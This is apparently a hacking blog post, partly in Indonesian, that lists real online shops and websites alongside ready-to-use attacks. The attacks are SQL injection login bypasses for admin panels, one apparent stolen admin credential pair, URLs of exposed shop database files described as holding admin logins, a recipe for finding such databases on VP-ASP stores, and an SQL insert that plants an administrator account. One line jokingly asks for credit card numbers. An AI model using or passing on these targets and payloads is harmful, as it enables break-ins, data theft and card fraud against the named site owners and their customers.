http://www.dolphinstreetdesigns.net/shopping/shopdbtest.asp
http://www.armoredplanet.com/vpshop/shopdbtest.asp
http://www.mediablend.com/demos/ecommerce/mbstore/store/shopdbtest.asp
http://www.freewebfront.com/admin/orders.asp
http://www.gpscompany.com/necart/lor/admin/orders.asp
https://secure.digiweb.net.nz/modchipsconz/admin/upload.htm
http://www.bruinstuff.com/ProductCart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.myeventshots.com/ProductCart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.virtualimpact.net/productcart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.idream.com.sg/productcart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.danitasboutique.com/ProductCart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.thecarshopnj.com/productcart/pcadmin/login.asp?idadmin='' or 1=1--
http://www.indiarc.netfirms.com/cgi-bin/album/album.pl?photo=DrPonidi.jpg
http://images.girly-geek.com/cgi-bin/album.pl?photo=/pon.jpg
http://www.hbr11.com/cgi-bin/album.pl?photo=DR`PONIDI/pon.jpg
http://www.comersus.com/message.asp?message=Dr`Ponidi+minta+ccnya+dong
http://myanmarbestbuy.com/store/comersus_message.asp?message=
http://www.eltiante.com/shop/store/comersus_message.asp?message=
http://extremetracking.com/free-1/scripts/reports/display/nph-edit.cgi?tag=tigcgi&server=z
http://cheiron.humanities.mcmaster.ca/~htp/cgi/edit.cgi?22
http://www.worldwidewiki.net/wiki/OneBigWikiAlphabeticalIndexS/edit
http://www.worldwidewiki.net/wiki/OneBigWiki/edit
http://urchin.earth.li/cgi-bin/twic/wiki/view.pl?page=RSS
*****Sample*****
http://www.1616us.com/shop/shopadmin.asp login=ylp34a# pass=prod43@
http://www.prc-cosmetics.com/asp/newver/mbh/com/xinqi/manage/login.asp L:admin P:' or '1' = '1
http://www.sdi.com.tw/manage/login.asp L:sdi P:sdi / L:sdi P:' or '1' = '1
http://www.slimlife.biz/manage/login.asp? L:admin P:' or '1' = '1
http://www.nlio.idv.tw/disaster/manage/login.asp L:admin P:' or '1' = '1
http://www.lobsterclub.co.kr/news/list.asp L:admin P:' or '1' = '1
http://teayang.co.kr/manage/Default.asp L:admin P:' or '1' = '1
http://www.kmistc.com/manage/default.asp L:admin P:' or '1' = '1
http://www.yxsz.yn.cn/manage/login1.asp L:admin P:' or '1' = '1
http://bikmrdc.lm.fju.edu.tw/manage/login.asp L:admin P:' or '1' = '1
http://www.erp-china.com/Information/infomanage/login.asp L:admin P:' or '1' = '1
seongdong.seoul.go.kr/%EC%84%B1%EB%8F%99%EC%A7%80%EC%97%AD%EA%B2%BD%EC%A0%9C/ manage/login.asp L:admin P:' or '1' = '1
chinaqd-tianrun.com/zengrun/manage/login.asp L:admin P:' or '1' = '1
http://demo.bechoice.com/newsii/manage/login.asp L:admin P:' or '1' = '1
http://www.0577china.com/glasses/manage/login.asp L:admin P:' or '1' = '1
http://ba.lm.fju.edu.tw/singing/ib/MANAGE/login.asp L:admin P:' or '1' = '1
http://www.daeholoan.com/manage/login.asp L:admin P:' or '1' = '1
http://www.gesfim.fr/Manage/login.asp L:admin P:' or '1' = '1
http://www.sggs-cn.com/manage/login.asp L:admin P:' or '1' = '1
http://www.ebooth.com.tw/manage/login.asp L:admin P:' or '1' = '1
http://www.dachangyt.com/lijing/manage/login.asp L:admin P:' or '1' = '1
http://www.516700.com/htgirl/manage/login.asp L:admin P:' or '1' = '1
/fpdb/shop.mdb
/shoponline/fpdb/shop.mdb
/database/metacart.mdb
/shopping/database/metacart.mdb
/shop/database/metacart.mdb
/metacart/database/metacart.mdb
/mcartfree/database/metacart.mdb
/ASP/cart/database/metacart.mdb
http://www.premierhawaii.com/Shopping/ivan.mdb
http://www.exclamationscubancigars.com/cgi-bin/shopping350.mdb
http://www.norteamengros.no/shop/shopping400.mdb
http://www.aamx.com/shopping450.mdb
http://www.onlinedancing.com/shop/shopping.mdb
http://www.missouririvertraders.com/shopping/missouri.mdb
http://www.jinhuaham.com/newshop/shopping.mdb
http://www.copperfast.com/metacart/metacart.mdb
http://www.ocie.com/metacart/metacart.mdb
http://www.scrappingcorner.com/productcart/pcadmin/eipc.mdb
http://glasspec.com/productcart/pcadmin/eipc.mdb
http://www.nexostherapeuticals.com/productcart/pcadmin/eipc.mdb
http://www.azardisplays.com/productcart/pcadmin/eipc.mdb
-----------------------------------------------------------------
************Sample**************
https://secure.wetplanet.com/comersus/backofficelite/comersus_backoffice_index.asp
https://secure.wetplanet.com/comersus/backofficelite/comersus_backoffice_rc4Exec.asp
https://secure.wetplanet.com/comersus/backofficelite/comersus_backoffice_menuUtilities.asp
http://www.digitalive.hpg.com.br/database/comersus.mdb
http://members.xoom.virgilio.it/superand/comersus/database/comersus.mdb
http://www.digiser.ritex.com/tienda2/database/COMERSUS.mdb
http://home.bhak-voitsberg.ac.at/students/1538reicher/comersus/database/comersus.mdb
http://www.musiceducationcenter.com/comersus/store/comersus.mdb
----------------------------------------------------------------------------
cari file data basenya yang extensinya .mdb file ini bisa di buka dengan microsoft acces terbaru, dan berisi login dan pass admin nya.
RUMUSNYA:
http://[vp-asp site]/[vp-asp dir]/[xDatabase + .mdb]
http://[vp-asp site]/[vp-asp dir]/shopdbtest.asp --> untuk mengetahui nama file data basenya. bisa juga mengetahui lokasi filenya.
http://[vp-asp site]/[vp-asp dir]/shopa_sessionlist.asp --> ini untuk mengetahui posisi/ letak file mdb nya.
misal : www.toko.com/shop/toko.mdb
www.target.com/cgi-local/shopper.cgi?preadd=action&key=...
www.target.com/cgi-bin/shopper.cgi?preadd=action&key=...
www.target.com/cgibin/shopper.cgi?preadd=action&key=..
www.target.com/cgi-local/shopper.cgi?preadd=action&key=...
RUMUSNYA:
http://[vp-asp site]/[vp-asp dir]/[xDatabase + .mdb]
http://[vp-asp site]/[vp-asp dir]/shopdbtest.asp --> untuk mengetahui nama file data basenya. bisa juga mengetahui lokasi filenya.
http://[vp-asp site]/[vp-asp dir]/shopa_sessionlist.asp --> ini untuk mengetahui posisi/ letak file mdb nya.
***********Injection (jar)***************
insert into tbluser ("fldusername","fldpassword","fldaccess") values ('ascii','ascii','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
0 komentar:
Post a Comment